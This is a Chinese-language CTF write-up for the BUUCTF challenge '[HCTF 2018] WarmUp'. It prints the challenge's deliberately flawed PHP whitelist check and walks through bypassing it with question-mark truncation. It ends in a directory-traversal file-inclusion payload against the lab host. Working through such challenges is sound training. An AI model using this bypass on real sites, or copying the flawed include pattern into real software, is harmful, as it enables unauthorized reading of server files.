【BUUCTF】WEB篇1:[HCTF 2018]WarmUp
作者:互联网
来源:BUUCTF
进入页面:
F12查看源代码:
<!DOCTYPE html> <html lang="en"> <head> <meta charset="UTF-8"> <meta name="viewport" content="width=device-width, initial-scale=1.0"> <meta http-equiv="X-UA-Compatible" content="ie=edge"> <title>Document</title> </head> <body> <!--source.php--> <br><img src="https://i.loli.net/2018/11/01/5bdb0d93dc794.jpg" /></body> </html>
第10行可见提示要我们进入./source.php
进去后可以看见代码:
<?php highlight_file(__FILE__); class emmm { public static function checkFile(&$page) { $whitelist = ["source"=>"source.php","hint"=>"hint.php"]; if (! isset($page) || !is_string($page)) { echo "you can't see it"; return false; } //白名单过滤 if (in_array($page, $whitelist)) { return true; } //问号过滤 $_page = mb_substr( $page, 0, mb_strpos($page . '?', '?') );
//白名单过滤 if (in_array($_page, $whitelist)) { return true; } //URL编码 $_page = urldecode($page);
//问号过滤 $_page = mb_substr( $_page, 0, mb_strpos($_page . '?', '?') );
//白名单过滤 if (in_array($_page, $whitelist)) { return true; } echo "you can't see it"; return false; } } if (! empty($_REQUEST['file']) && is_string($_REQUEST['file']) && emmm::checkFile($_REQUEST['file']) ) { include $_REQUEST['file']; exit; } else { echo "<br><img src=\"https://i.loli.net/2018/11/01/5bdb0d93dc794.jpg\" />"; } ?>
最后一部分
1 if (! empty($_REQUEST['file']) 2 && is_string($_REQUEST['file']) 3 && emmm::checkFile($_REQUEST['file']) 4 ) { 5 include $_REQUEST['file']; 6 exit; 7 } else { 8 echo "<br><img src=\"https://i.loli.net/2018/11/01/5bdb0d93dc794.jpg\" />"; 9 }
可知,file不能为空值,且file的属性应为字符串,file还应该在emmm类的checkFile里通过
往上翻看到emmm类的checkFile方法时:hint应该是hint.php
所以我们再次构建网址为:http://1a362e26-a1a1-428b-93f4-f7f849b9090f.node3.buuoj.cn/index.php?file=hint.php
登进去以后发现
反过头来接着看souce.php的代码,发现经过了白名单过滤、URL编码、问号过滤、白名单过滤、问号过滤、白名单过滤
所以最终构造:hint.php?../../../../../ffffllllaaaagggg
得到flag:
标签:WEB,BUUCTF,hint,REQUEST,HCTF,过滤,file,php,page 来源: https://www.cnblogs.com/ShEn9/p/14073080.html